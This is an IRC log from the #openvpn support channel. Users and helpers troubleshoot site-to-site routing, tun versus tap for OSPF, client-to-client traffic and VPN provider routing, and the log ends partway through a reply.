[~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 07:35 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has quit [Read error: Operation timed out] 07:41 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Ping timeout: 248 seconds] 07:43 < yeshello1here> IT: i'm sure many people will help you set it up for no charge 07:44 < IT> i have run out of ideeas 07:44 < yeshello1here> IT: openvpn is pretty easy to set up! what are you trying to do? 07:45 < IT> i'm trying to setup a office-2-office connection with different subnets 07:45 < yeshello1here> ok so you want each office to be able to access the other office over a vpn? 07:45 < IT> yes 07:46 < IT> i got openvpn running and connecting but i can't access the other network pc's 07:46 < yeshello1here> are you running openvpn on the default gateway for your network? 07:46 < IT> yes, on every office 07:47 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 07:48 < yeshello1here> IT: sorry, just dealing with my own problem there 07:52 < yeshello1here> IT: it sounds like a default gateway issue anyhow, if you detail what debugging you've done i'll help a bit more in a minute 07:52 < yeshello1here> just got an OSPF issue to fix :( 07:53 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has joined #openvpn 07:54 <@ecrist> good mroning 07:55 <+rob0> IT, what is your budget, and what OSs are involved? 07:55 -!- soulse [~soulse@190.222.252.9] has joined #openvpn 07:55 < IT> atm i'm not sure if i'm using the right configuration for this http://pastebin.com/RQnHWwxL 07:56 < IT> @rob0t, check PM 07:57 < yeshello1here> morning ecrist 08:01 < fu_fu> Hello, G'morning 08:01 -!- soulse [~soulse@190.222.252.9] has quit [Read error: Operation timed out] 08:01 < yeshello1here> so i want to run a tap openvpn 08:01 < yeshello1here> but i also want my clients to get /30s 08:01 < yeshello1here> as i care only about multicast availability on the link 08:01 < yeshello1here> (so i can run ospf over it!) 08:02 <@ecrist> why do you want to use tap, then? 08:02 < yeshello1here> as i understand multicast on tun doesn't work? 08:02 <@ecrist> that doesn't make sense 08:02 < yeshello1here> i'm sure i tested it originally but that was like 18 months ago 08:03 < yeshello1here> so openvpn should support multicast over tuns? cause if so i'll just switch to that right now 08:03 <@ecrist> i believe so, yes 08:03 -!- bjh4 [~bjh4@ool-18bbdf6b.static.optonline.net] has joined #openvpn 08:03 < yeshello1here> is there an easy way to assign them a specific tun # too? 08:03 <@ecrist> tun devices won't support broadcast, but that's not related to multicast. 08:03 <@ecrist> !cd 08:03 <@ecrist> !ccd 08:04 <@vpnHelper> "ccd" is (#1) entries that are basically included into server.conf, but only for the specified client based on common-name. use --client-config-dir to enable it, then put the config options for the client in /common-name or (#2) the ccd file is parsed each time the client connects. 08:04 <@ecrist> !static 08:04 <@vpnHelper> "static" is (#1) use --ifconfig-push in a ccd entry for a static ip for the vpn client or (#2) example in net30 (default): ifconfig-push 10.8.0.6 10.8.0.5 example in subnet (see !topology) or tap (see !tunortap): ifconfig-push 10.8.0.5 255.255.255.0 or (#3) also see !ccd and !iporder 08:04 < yeshello1here> uh i meant the actual tun device, as i have two tun VPNs configured on a debian box 08:04 <@plaisthos> yeshello1here: you don't need multicast for ospf. You can statically configure neighbours ... 08:04 < yeshello1here> i'm just gonna go read up on configuration though to make sure i don't screw things up too badly 08:05 <@ecrist> yeshello1here: those two things vpnHelper just said will get you static IPs for your clients 08:05 < yeshello1here> plaisthos: in this use case we can't go with simple static configs 08:05 < yeshello1here> ecrist: static IPs don't matter, it's just the actual tun device number that i care about 08:05 < yeshello1here> thanks for all the help so far though 08:05 <@ecrist> yeshello1here: that's specific to linux, but you can specify a tun device number in the config 08:06 <@ecrist> --dev tun0 08:06 <@ecrist> --dev tun1 08:06 <@ecrist> etc 08:06 < yeshello1here> ok well i'll hope that works, doing some dangerous stuff at 2pm on a monday haha 08:07 -!- soulse [~soulse@190.222.252.9] has joined #openvpn 08:09 <@ecrist> yeshello1here: no reason it shouldn't work. 08:09 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Quit: Leaving.] 08:10 < yeshello1here> ecrist: the issue is that one site is only connected via this currently badly configured VPN 08:11 < yeshello1here> it was haphazardly moved and set up and now needs careful attention 08:11 <@ecrist> well, that's not a problem with OpenVPN so much as it's your problem. :) 08:11 < IT> guys, any ideea what i'm missing here http://pastebin.com/RQnHWwxL ? 08:12 <@ecrist> why do you think you're missing something? 08:15 < IT> i can't ping the other lan gw or machines 08:15 <@ecrist> do you see anything in your logs? 08:16 < IT> just this warning" WARNING: 'ifconfig' is present in remote config but missing in local config, remote='ifconfig 10.0.8.0 255.255.255.0'" 08:17 <@ecrist> !logs 08:17 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 08:17 < IT> ok, sec 08:17 <@ecrist> IT: you have two servers and no clients? 08:17 <@ecrist> generally, the way this works is one is a server, the other is a client 08:18 <@ecrist> remove line 31 08:18 <@ecrist> remove line 29 08:18 <@ecrist> and 28 08:18 < IT> on server? 08:18 <@ecrist> and 33 08:19 <@ecrist> from your pastebin 08:19 < IT> ok 08:19 <@ecrist> (and affect those changes on the appropriate config) 08:20 < IT> if i do that i get Options error: Parameter ca_file can only be specified in TLS-mode, i.e. where --tls-server or --tls-client is also specified. 08:21 <@ecrist> remove tls-client and replace it with client 08:21 < IT> k 08:22 < IT> i removed them and i can ping the other vpn's interface 10.0.8.2 08:23 < IT> getting RwrWRwrWRwrWRwrWRwrWWRWRWRWR in the log while dooing it 08:23 < IT> but that's as far as it goes 08:23 < IT> can't reach the gw or machines behind it 08:23 <@ecrist> please pastebin your logs 08:23 <@ecrist> verb set to 4 or higher 08:24 -!- test003 [~test003@soho-94-143-249-78.sohonet.co.uk] has joined #openvpn 08:24 -!- test003 is now known as lurpy 08:25 < IT> verb 5 -> server http://pastebin.com/1TpXhT20 08:25 < IT> -> client http://pastebin.com/c2mFHDY1 08:26 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 08:27 <@ecrist> from the client, are you able to ping 10.0.8.1? 08:28 <@ecrist> looks like the VPN came up without issue 08:28 <@ecrist> !goal 08:28 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 08:28 <@ecrist> afk a few 08:29 < fu_fu> question: is it possible to install additional w32-Tun/tap adapters on windows? likewise additional versions of openvpn? 08:29 < IT> @ecrist, yes i can ping 10.0.8.1 from the client 08:30 < yeshello1here> hmm ok so i reconfigured my VPN to tun, and OSPF is configured in point to point, but i ain't seeing it, i think cause the peer address doesn't respond, which is kinda odd 08:30 < IT> goal - I would like to access the lan behind the server and vice-versa 08:30 <@dazo> fu_fu: yes, it should be a addtap.bat file where you'll find the openvpn.exe file .... run that one to add another tap adapter 08:30 <@dazo> fu_fu: it should also be fairly well documented in man and howto pages, how to tell openvpn to use these different tap adapters too 08:32 < fu_fu> dazo nice, thanks, if I add the adapter and dev tun0, 1, 2; and install dif versions in dif dirs, then the service seems to get overwritten 08:34 <@dazo> fu_fu: the service stuff might be somewhat different, yes ... but running openvpn service with different versions of openvpn sounds like a very odd setup ... so then you need to hack it yourself 08:34 * dazo pulls up his normal disclaimer: dazo is not a Windows user 08:35 < fu_fu> lol, i am setting up on linux next 08:37 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has quit [Quit: Computer has gone to sleep.] 08:50 -!- valparaiso [~valparais@ARennes-257-1-179-35.w2-13.abo.wanadoo.fr] has left #openvpn [] 08:53 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 08:56 < yeshello1here> yeah ecrist i'm having some weird issues here 08:56 < yeshello1here> i think it's because the tunnel is set up between ex: .5 and .6 08:56 < yeshello1here> but the server only responds on .1 08:56 < yeshello1here> i'm gonna try with pool-linear 08:56 < yeshello1here> see what happens 08:58 < yeshello1here> that looks much better now 08:59 < yeshello1here> oh so close 08:59 < yeshello1here> i can see the peer but it doesn't get into a full state 09:03 < yeshello1here> yeah so the problem i guess is that openvpn handles its own internal routing for that 09:12 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has joined #openvpn 09:22 < yeshello1here> plaisthos / ecrist: i've now been told that in fact openvpn's internal routing table precludes using ospf in any way but p2p, the only other way around it i can see is if i could generate a bunch of /30 connections but using tap so i could run broadcast across it 09:23 < yeshello1here> however iptables-pool seems insistent on making one big network if i use tap, is there any way around this? 09:24 < IT> use tun ? 09:24 < yeshello1here> it won't work because the endpoint addresses do not match 09:24 < yeshello1here> (unless you use p2p) 09:24 < fu_fu> yeshello1here, oyu can firewall or accesslist, TAP is meant to make one big LAN, if you want to route, use TUN 09:25 < fu_fu> can you use p2p? why do you want TAP? 09:25 < yeshello1here> tun won't work because openvpn presents only its internal address for routing and so i can't run ospf across it unless both sides match 09:25 < yeshello1here> fu_fu: it would be less configuration and armache basically 09:25 < yeshello1here> cause i could just run broadcast across it and any clients connecting would be fine 09:25 < yeshello1here> instead of having to make individual VPNs for each potential endpoint 09:28 < fu_fu> interesting, are you on *nix or Win? 09:30 < yeshello1here> nix, i'm wondering about --topology 09:30 < yeshello1here> i don't think it'd work like i'm looking for really 09:30 < yeshello1here> i need to take a short break and go over this 09:31 < fu_fu> if you are using ospf you should be able to get away with using p2p. you will have more complete control of routing 09:31 < yeshello1here> yeah i'm just concerned about setting up 10+ tun devices and managing them all as nicely 09:31 < fu_fu> heh, ya, that's new to me 09:32 < yeshello1here> i assume i can still go with CA auth? 09:32 < yeshello1here> i bloody hope so! 09:32 < fu_fu> sure, no reason why not 09:39 -!- soulse [~soulse@190.222.252.9] has quit [Remote host closed the connection] 09:40 -!- soulse [~soulse@nat/cisco/x-zkqauoaharydwnac] has joined #openvpn 09:52 -!- dazo is now known as dazo_afk 09:53 <@ecrist> IT: you're VPN is working, if you can ping 10.0.8.1 09:53 <@ecrist> now you need to push the proper routes 09:54 <@ecrist> yeshello1here: use tap, then. 09:54 <@ecrist> you can still use routed VPN (avoid bridge, if you can) 09:55 < yeshello1here> ecrist: tap always uses the subnet topology 09:55 < yeshello1here> which is the problem 09:55 < yeshello1here> as it causes errant ospf adjacencies 09:56 <@ecrist> see if this helps you at all: http://www.secure-computing.net/wiki/index.php/OpenVPN/RIPRouting 09:56 <@vpnHelper> Title: OpenVPN/RIPRouting - Secure Computing Wiki (at www.secure-computing.net) 09:56 < yeshello1here> ecrist: this is how i am now setting it up (telling a peon to set it up for me) 09:57 < yeshello1here> individual p2p links between the various machines 09:57 < yeshello1here> i'm quite happy with that solution really 09:57 < yeshello1here> ecrist: i have a more important (ie personal) issue to solve, i have a tap vpn bridged into br0, i am trying to communicate client to client without client-to-client set, from my reading of the documentation this should forward traffic on to the bridge interface 09:57 < yeshello1here> this seems to be happening, i see the ARP request from my machine 09:57 < yeshello1here> but 09:58 < yeshello1here> it never makes it to the client, so openvpn seems to be ignoring incoming arps for client addresses from the bridge or similar 09:58 <@ecrist> you won't be able to, without client-to-client 09:58 < yeshello1here> that seems rather dangerous? 09:58 <@ecrist> no 09:58 < yeshello1here> i want to have some measure of firewalling between clients 09:58 -!- dazo_afk is now known as dazo 09:58 <@ecrist> if you want clients to talk to eachother, you need to enable client-to-client 09:58 <@ecrist> use a firewall, then 09:59 < yeshello1here> the documentation isn't very clear on that 09:59 < yeshello1here> how can i use a firewall, if the packets never leave openvpn? :) 09:59 <@ecrist> if you enable client-to-client, they do 09:59 < yeshello1here> wait, that's not what the documentation says 09:59 < yeshello1here> with client-to-client packets are routed internally within openvpn 09:59 < yeshello1here> and never hit the OS stack for firewalling 09:59 < yeshello1here> that means i have to tell my users to maintain their own security, which is pretty annoying compared 09:59 <@ecrist> have you tried it? 10:00 <@ecrist> iirc, there's an error in the docs 10:00 < yeshello1here> no i'm currently on the VPN so i can't kill it until later on 10:00 <@ecrist> that's hardly *my* problem. :P 10:00 < yeshello1here> i'll give it a go anyhow 10:00 <@ecrist> you could setup a test vpn 10:00 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has quit [Ping timeout: 248 seconds] 10:00 < yeshello1here> i'm just making my excuses before i get shouted at :) 10:00 < yeshello1here> ecrist: i could, but it's not so urgent i can't test it later on today 10:00 <@ecrist> it's what we'd do 10:00 < yeshello1here> i can always tell the users to firewall themselves 10:01 < yeshello1here> but it's nicer to do it for them 10:02 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has joined #openvpn 10:02 -!- zol_ [~z@del63-4-78-248-82-46.fbx.proxad.net] has quit [Remote host closed the connection] 10:06 -!- soulcito [~soulse@nat/cisco/x-cqtmoghxzixmmfif] has joined #openvpn 10:07 -!- Tativie [~Tativie@gateway/tor-sasl/tativie] has joined #openvpn 10:09 -!- soulse [~soulse@nat/cisco/x-zkqauoaharydwnac] has quit [Ping timeout: 240 seconds] 10:09 < Tativie> Is there a good watchdog program for when the vpn goes down (debian-gnome)? 10:10 -!- soulse [~soulse@nat/cisco/x-aojgevtxztkmahxk] has joined #openvpn 10:10 -!- soulcito [~soulse@nat/cisco/x-cqtmoghxzixmmfif] has quit [Read error: Connection reset by peer] 10:11 < Tativie> Or perhaps some setting in the config that will prevent connections when the vpn fails? 10:12 <+rob0> !keepalive 10:12 <@vpnHelper> "keepalive" is (#1) see --keepalive in the manual for how to make clients retry connecting if they get disconnected. or (#2) basically it is a wrapper for managing --ping and --ping-restart in server/client mode or (#3) if you use this, don't use --tls-exit and also avoid --single-session and --inactive 10:14 <@dazo> Tativie: two options ... 1) a tiny script which fpings the remote VPN ... and barfs if it can't get contact .... 2) A little log watch framework I wrote (haven't publicly released it yet, but works well) ... http://fedorapeople.org/cgit/dsommers/public_git/logactio.git/ 10:14 <@vpnHelper> Title: logactio.git - Simple log file watcher framework which does certain actions when some log events happen (at fedorapeople.org) 10:14 < Tativie> rob0: Do you know how I can spesify a .conf file with that setting it in for the gnome shell? Right not it doesn't seem to have any .conf file with the keys or elsewhere. 10:15 <+rob0> that question does not make sense. You create your config files. 10:16 <@dazo> (unless you use NetworkManager .....) 10:16 < Tativie> I have a server config, but don't think I have a client one. 10:16 < Tativie> I know you can have a client one too, but not sure how to set it with debian running gnome 10:17 < Tativie> I could spesify it in the command line when I start the openvpn, I know 10:17 < Tativie> but not sure how to set it with the gnome desktop, which is what I would prefer if possible. 10:18 <+rob0> okay, I am not using any kind of GUI frontend, so I can't help with those 10:18 <@dazo> Tativie: You can consider to try gopenvpn ... that uses normal config files ... and gives you a reasonable GUI to start/stop/monitor your tunnels 10:18 <+rob0> you might want to review your distro's openvpn package documentation, which might tell you how to name your files and where to put them 10:19 < Tativie> Both good ideas, Thanks :) I'll go do some reading and playing around with gopenvpn. 10:19 -!- Tativie [~Tativie@gateway/tor-sasl/tativie] has left #openvpn [] 10:21 -!- master_of_master [~master_of@p57B536BC.dip.t-dialin.net] has quit [Ping timeout: 260 seconds] 10:23 -!- master_of_master [~master_of@p57B55F0A.dip.t-dialin.net] has joined #openvpn 10:24 < yeshello1here> you know i just realised 10:24 < yeshello1here> like 5 meg memory use 10:24 < yeshello1here> for a fairly big VPN server 10:24 < yeshello1here> is hilariously efficient 10:24 -!- dazo is now known as dazo_afk 10:24 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 246 seconds] 10:50 < fu_fu> I have a TUN server in AWS cloud and clients all-over. one client has a LAN that needs to be visible, and a printer that all clients need to print to. Windows OSs. The cloud server has the main need for printing. any ideas? 10:51 <@ecrist> as long as you do the routing properly, the printing should work by IP 10:53 < fu_fu> there is some difficulty with routing that I am having, possibly due to AWS now using 10.8.0.0 subnet for the region, when i push the routes things start to break 10:54 <@ecrist> !1918 10:54 <@vpnHelper> "1918" is (#1) RFC1918 makes three unique netblocks available for private use: 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 or (#2) see also: http://en.wikipedia.org/wiki/Private_network or http://www.faqs.org/rfcs/rfc1918.html or (#3) Too lazy to find your own subnet? Try this one: http://scarydevilmonastery.net/subnet.cgi 10:54 <@ecrist> try a different range 10:55 < fu_fu> ya, i tried 10.251.0.0 and it works, but I wonder when they will get to that, the 172.0.0.0 are taken in AWS-EU, 192.X are typical for client LANs 10:56 < fu_fu> 172.12.0.0^ 10:56 < fu_fu> oops again 172.16.0.0. 10:57 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has quit [Ping timeout: 252 seconds] 10:58 < fu_fu> is there a listing of the vpnHelper !_tags? 10:59 <+EugeneKay> !factoids 10:59 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php 11:01 < fu_fu> cool thanks 11:03 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has joined #openvpn 11:06 -!- raidz_away is now known as raidz 11:06 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 11:17 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 11:17 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Read error: Connection reset by peer] 11:17 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 11:17 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 11:17 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 11:38 -!- soulcito [~soulse@190.222.252.9] has joined #openvpn 11:39 -!- soulse [~soulse@nat/cisco/x-aojgevtxztkmahxk] has quit [Ping timeout: 248 seconds] 11:46 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 11:52 -!- soulse [~soulse@190.222.252.9] has joined #openvpn 11:53 -!- soulcito [~soulse@190.222.252.9] has quit [Ping timeout: 276 seconds] 12:06 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 260 seconds] 12:10 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 252 seconds] 12:11 -!- wrod [~wrodrigue@triband-mum-120.61.4.231.mtnl.net.in] has joined #openvpn 12:25 -!- ronsel [~ronsel@dslb-088-074-167-187.pools.arcor-ip.net] has quit [Quit: Dieser Computer ist eingeschlafen] 12:26 -!- wrod [~wrodrigue@triband-mum-120.61.4.231.mtnl.net.in] has left #openvpn ["Leaving"] 12:37 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 12:37 -!- soulcito [~soulse@190.222.252.9] has joined #openvpn 12:39 -!- soulse [~soulse@190.222.252.9] has quit [Ping timeout: 260 seconds] 12:40 -!- soulcito [~soulse@190.222.252.9] has quit [Remote host closed the connection] 12:40 -!- soulse [~soulse@nat/cisco/x-xnmnzjlkesaokezq] has joined #openvpn 13:09 -!- brute11k [~brute11k@89.249.235.75] has quit [Quit: Leaving.] 13:19 -!- fu_fu1 [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 13:19 -!- fu_fu1 [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Client Quit] 13:21 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has quit [Quit: Leaving] 13:24 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Ping timeout: 276 seconds] 13:33 -!- kyrix [~ashley@71-212-76-89.tukw.qwest.net] has joined #openvpn 13:45 < yeshello1here> ecrist: you seem to be correct, there was an error in the docs, client-to-client has magically made everything right with the world 13:46 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 13:50 -!- awdjadj [~IceChat77@91.225.135.254] has joined #openvpn 13:50 <@ecrist> right 13:50 <@ecrist> I'll work on changing it 13:57 < yeshello1here> i don't really have the authority to do that 13:57 < yeshello1here> but if i can help, please let me know how 13:58 < yeshello1here> if it involves a lot of reading C, expect procrastination and idelenss 13:58 <@ecrist> 13:50:28 <@ecrist> I'll work on changing it 13:59 <@ecrist> I didn't ask/tell you to do it 13:59 < yeshello1here> oh sorry 14:00 < yeshello1here> i've been up for ages 14:00 < yeshello1here> i thought you said "I'd work on changing it" :) 14:00 < yeshello1here> blurry eyes, bad vision, more excuses etc 14:00 < yeshello1here> still that's 2 vpn issues and one ospf issue sorted today 14:01 -!- _0x783czar [~0x783czar@50.117.78.133] has joined #openvpn 14:02 -!- soulse [~soulse@nat/cisco/x-xnmnzjlkesaokezq] has quit [Remote host closed the connection] 14:02 -!- soulse [~soulse@nat/cisco/x-gutqdbxcmbhfdkqw] has joined #openvpn 14:02 * rob0 read "it" in "I'll work on changing it" as "everything [being] right with the world" 14:03 < _0x783czar> Is it possible to manually configure my MacBook to connect to my openvpn account through the System Preferences Networking Pane? in otherwords, without the Private Tunnel client. 14:04 <@ecrist> _0x783czar: maybe 14:04 <@ecrist> not sure of a way, though 14:04 <+rob0> That sounds like a MacOS question. But indeed, a Mac can run openvpn directly from the shell. 14:05 < _0x783czar> rob0: yeah, I know how to set up a vpn on my Mac, but I don't know what server to point it to. 14:05 < _0x783czar> or what protocol it uses 14:06 <@ecrist> it uses openvpn 14:07 <@ecrist> you need an openvpn client - you can't use any generic VPN protocol 14:07 < _0x783czar> ecrist: oh so openvpn is it's own protocol? so not PPTP 14:07 <@ecrist> Tunnelblick is free 14:08 <@ecrist> private tunnel is an OpenVPN Technologies solution - it's written/managed by the same people at corp that help develop openvpn 14:08 < _0x783czar> ecrist: yeah, i'm able to connect using the PrivateTunnel client, but I was just wondering if I could set it up to use OSXs built in connection manager 14:09 <@ecrist> oh, no, you cannot 14:09 < _0x783czar> ecrist: OK. Oh well, thank-you very much for your help 14:14 -!- awdjadj [~IceChat77@91.225.135.254] has quit [Quit: OUCH!!!] 14:15 -!- _0x783czar [~0x783czar@50.117.78.133] has quit [Ping timeout: 255 seconds] 14:27 -!- soulcito [~soulse@nat/cisco/x-fgfiuxlqkvuxaqma] has joined #openvpn 14:31 -!- soulse [~soulse@nat/cisco/x-gutqdbxcmbhfdkqw] has quit [Ping timeout: 265 seconds] 14:32 -!- soulse [~soulse@190.222.252.9] has joined #openvpn 14:34 -!- soulcito [~soulse@nat/cisco/x-fgfiuxlqkvuxaqma] has quit [Ping timeout: 240 seconds] 14:54 -!- dan_ [~dan@c-98-228-62-52.hsd1.il.comcast.net] has joined #openvpn 14:58 -!- DBordello [~DBordello@unaffiliated/dbordello] has quit [Ping timeout: 260 seconds] 15:00 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 15:12 -!- soulse [~soulse@190.222.252.9] has quit [Remote host closed the connection] 15:12 -!- soulse [~soulse@nat/cisco/x-wgksrcjowvejcasu] has joined #openvpn 15:20 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn 15:20 -!- soulse [~soulse@nat/cisco/x-wgksrcjowvejcasu] has quit [Read error: Connection reset by peer] 15:21 -!- soulse [~soulse@190.222.252.9] has joined #openvpn 15:23 -!- dan_ [~dan@c-98-228-62-52.hsd1.il.comcast.net] has quit [Quit: Leaving] 15:27 -!- bjh4 [~bjh4@ool-18bbdf6b.static.optonline.net] has quit [Ping timeout: 272 seconds] 15:35 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 15:40 * EugeneKay sneezes loudly 16:06 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has quit [Ping timeout: 240 seconds] 16:08 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has joined #openvpn 16:13 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Read error: Operation timed out] 16:18 -!- Kage` [~Kage@198.148.81.187] has left #openvpn ["Derp"] 16:18 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn 16:20 -!- kyrix_ [~ashley@71-212-76-89.tukw.qwest.net] has joined #openvpn 16:20 -!- kyrix [~ashley@71-212-76-89.tukw.qwest.net] has quit [Read error: Connection reset by peer] 16:25 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.223.wb.wifirst.net] has quit [Ping timeout: 260 seconds] 16:27 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn 16:32 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host] 16:32 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 16:34 -!- btor [~btor@nor75-19-82-244-49-15.fbx.proxad.net] has joined #openvpn 16:34 < btor> Hi all 16:36 < btor> i have a problem with openvpn, i use a VPN service, which is in a routed mode ( TUN interface ) but when i launch it on my server, my server become unreachable. So, do you know the step to specify openvpn to work on just online one interface like eth1 ? 16:38 <+pekster> btor: OpenVPN works just fine when you have a single physical network interface. It sounds like you messed up the configuration, because launching a routed configuration shouldn't do that. Did you not use a unique network range for your VPN? 16:38 < btor> in advance, sorry for my english i'm french ... 16:38 <+rob0> could be a lot of things, really 16:39 < btor> pekster, i use "Hide my ass" service, i dont have an access on the server, i just use it like a client 16:40 <+pekster> I'm not your provider, so I can't help you with their service. However, I suspect they're re-routing all traffic through the server, so you can't actually reach your server directly via your ssh or RDP or however you're doing it 16:42 <+pekster> You could probably perform some magic on the client side to add a host-specific route to reach your client IP (the one used by you to contact your remote host) and route that over the pre-existing connection. This is kind of an ugly solution though. Something like 'route YOUR_CLIENT_IP 255.255.255.255 net_gateway' (where you replace your known client IP with the IP you're using 16:42 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 16:42 <+pekster> That's sort of a bad solution, but there if you want to play with it 16:43 < btor> pekster, yes, that's what i want to do, like using iptable or other way to re-route it 16:43 <+pekster> I just told you how to do that 16:44 < btor> yes, and thank's you but i though it was possible to specify an interface to openvpn 16:45 <+rob0> it's [probably] not anything openvpn does. It's probably the change to the system route table. 16:45 <+pekster> You don't seem to understand what's going on. Your provider (which I am not affialated with and can't help you troubleshoot) is pushing the 'redirect-gateway' option, which over-rides your default gateway. If you want to override that for a specific Internet host, you need to configure it to do that, such as with the configuration line I just gave you 16:46 < btor> oh ok, i understand 16:48 < btor> thank's a lot people, i'll test it soon 16:55 -!- btor [~btor@nor75-19-82-244-49-15.fbx.proxad.net] has quit [Quit: Quitte] 16:56 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 17:02 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Remote host closed the connection] 17:02 -!- kyrix_ [~ashley@71-212-76-89.tukw.qwest.net] has quit [Read error: Connection reset by peer] 17:02 -!- kyrix_ [~ashley@71-212-76-89.tukw.qwest.net] has joined #openvpn 17:03 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 272 seconds] 17:03 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 255 seconds] 17:04 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Remote host closed the connection] 17:04 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 17:06 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 17:06 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 17:13 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has joined #openvpn 17:18 -!- soulse [~soulse@190.222.252.9] has quit [Remote host closed the connection] 17:19 -!- soulse [~soulse@nat/cisco/x-mrdcozdnjcbyeggf] has joined #openvpn 17:20 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 17:28 -!- brute11k [~brute11k@89.249.235.75] has joined #openvpn 17:41 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat] 18:01 -!- ben1066 [~quassel@unaffiliated/ben1066] has quit [Read error: Connection reset by peer] 18:04 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has quit [Quit: Leaving] 18:06 -!- kyrix_ [~ashley@71-212-76-89.tukw.qwest.net] has quit [Ping timeout: 260 seconds] 18:28 -!- ActionA [~ActionA@2001:470:7:1f6::2] has joined #openvpn 18:29 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Read error: Connection reset by peer] 18:31 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 18:44 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving] 18:58 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 19:05 -!- soulse [~soulse@nat/cisco/x-mrdcozdnjcbyeggf] has quit [Read error: Connection reset by peer] 19:05 -!- soulse [~soulse@190.222.252.9] has joined #openvpn 19:20 -!- raidz is now known as raidz_away 19:35 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 19:37 -!- ActionA [~ActionA@2001:470:7:1f6::2] has left #openvpn [] 19:40 < digilink> hey folks.... question for the experts. I am trying to setup a static key based site to site TUN/routed openvpn setup for simplicity. I have 3 subnets on one side, and just 1 subnet on the other side and want them to be bidirectional. Will IROUTE's work in a static key based setup or will I need to setup PKI instead? 19:45 <+pekster> 